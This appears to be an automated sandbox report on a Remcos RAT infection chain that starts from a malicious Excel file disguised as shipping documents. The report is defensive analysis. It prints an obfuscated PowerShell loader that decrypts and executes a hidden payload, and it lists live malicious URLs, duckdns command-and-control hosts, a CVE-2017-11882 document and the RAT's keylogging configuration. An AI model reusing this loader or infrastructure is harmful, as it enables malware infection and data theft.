Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3832, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 3944, ProcessName: wscript.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2832, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , ProcessId: 3544, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3832, ParentProcessName: RegAsm.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs" , ProcessId: 3944, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2832, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , ProcessId: 3544, ProcessName: wscript.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2832, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lyur", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lyur", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3832, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lyur", ProcessId: 4044, ProcessName: RegAsm.exe

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2832, Protocol: tcp, SourceIp: 188.114.96.3, SourceIsIpv6: false, SourcePort: 80

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2832, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS" , ProcessId: 3544, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2832, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3100, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3588, TargetFilename: C:\Users\user\AppData\Local\Temp\5umiqvdy.drc.ps1

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE Malicious Base64 Encoded Payload In Image - Source IP: 198.46.176.133 - Destination IP: 192.168.2.22

Timestamp:	2024-07-26T13:02:47.672740+0200
SID:	2049038
Source Port:	80
Destination Port:	49177
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 93.113.54.56 - Destination IP: 192.168.2.22

Timestamp:	2024-07-26T13:03:09.015072+0200
SID:	2012510
Source Port:	443
Destination Port:	49189
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.22 - Destination IP: 178.237.33.50

Timestamp:	2024-07-26T13:02:55.651850+0200
SID:	2803304
Source Port:	49186
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 - Source IP: 104.168.45.34 - Destination IP: 192.168.2.22

Timestamp:	2024-07-26T13:02:48.698318+0200
SID:	2020424
Source Port:	80
Destination Port:	49181
Protocol:	TCP
Classtype:	Exploit Kit Activity Detected

ET MALWARE Remcos 3.x Unencrypted Server Response - Source IP: 192.253.251.227 - Destination IP: 192.168.2.22

Timestamp:	2024-07-26T13:05:19.248660+0200
SID:	2032777
Source Port:	57484
Destination Port:	49183
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Base64 Encoded MZ In Image - Source IP: 198.46.176.133 - Destination IP: 192.168.2.22

Timestamp:	2024-07-26T13:02:46.699400+0200
SID:	2047750
Source Port:	80
Destination Port:	49177
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Remcos 3.x Unencrypted Checkin - Source IP: 192.168.2.22 - Destination IP: 192.253.251.227

Timestamp:	2024-07-26T13:02:52.137398+0200
SID:	2032776
Source Port:	49183
Destination Port:	57484
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.22 - Destination IP: 93.113.54.56

Timestamp:	2024-07-26T13:03:08.898096+0200
SID:	2803305
Source Port:	49189
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE UTF-8/16 Encoded Shellcode - Source IP: 93.113.54.56 - Destination IP: 192.168.2.22

Timestamp:	2024-07-26T13:03:03.332218+0200
SID:	2012510
Source Port:	443
Destination Port:	49188
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Remcos 3.x Unencrypted Server Response - Source IP: 192.253.251.227 - Destination IP: 192.168.2.22

Timestamp:	2024-07-26T13:02:53.848289+0200
SID:	2032777
Source Port:	57484
Destination Port:	49183
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Remcos 3.x Unencrypted Server Response - Source IP: 192.253.251.227 - Destination IP: 192.168.2.22

Timestamp:	2024-07-26T13:07:19.804539+0200
SID:	2032777
Source Port:	57484
Destination Port:	49183
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm	Avira URL Cloud: Label: malware
Source: https://asociatiatraditiimaria.ro/os/transportment.pfm	Avira URL Cloud: Label: malware
Source: iwarsut775laudrye2.duckdns.org	Avira URL Cloud: Label: malware
Source: http://198.46.176.133/Upload/vbs.jpeg	Avira URL Cloud: Label: malware
Source: http://new.quranushaiqer.org.sa	Avira URL Cloud: Label: malware
Source: https://new.quranushaiqer.org.sa	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E4A5FB01-995F-4785-9031-8AAEF937D825}.tmp	Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\715CC54E.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed

Found malware configuration

Source: 16.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: Remcos {"Version": "5.1.0 Pro", "Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0", "Assigned name": "MAGIC", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-A57Q98", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "sfvnspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for submitted file

Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	ReversingLabs: Detection: 21%
Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls	Virustotal: Detection: 25%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.3329a80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.3bc7e48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.957434022.0000000000751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
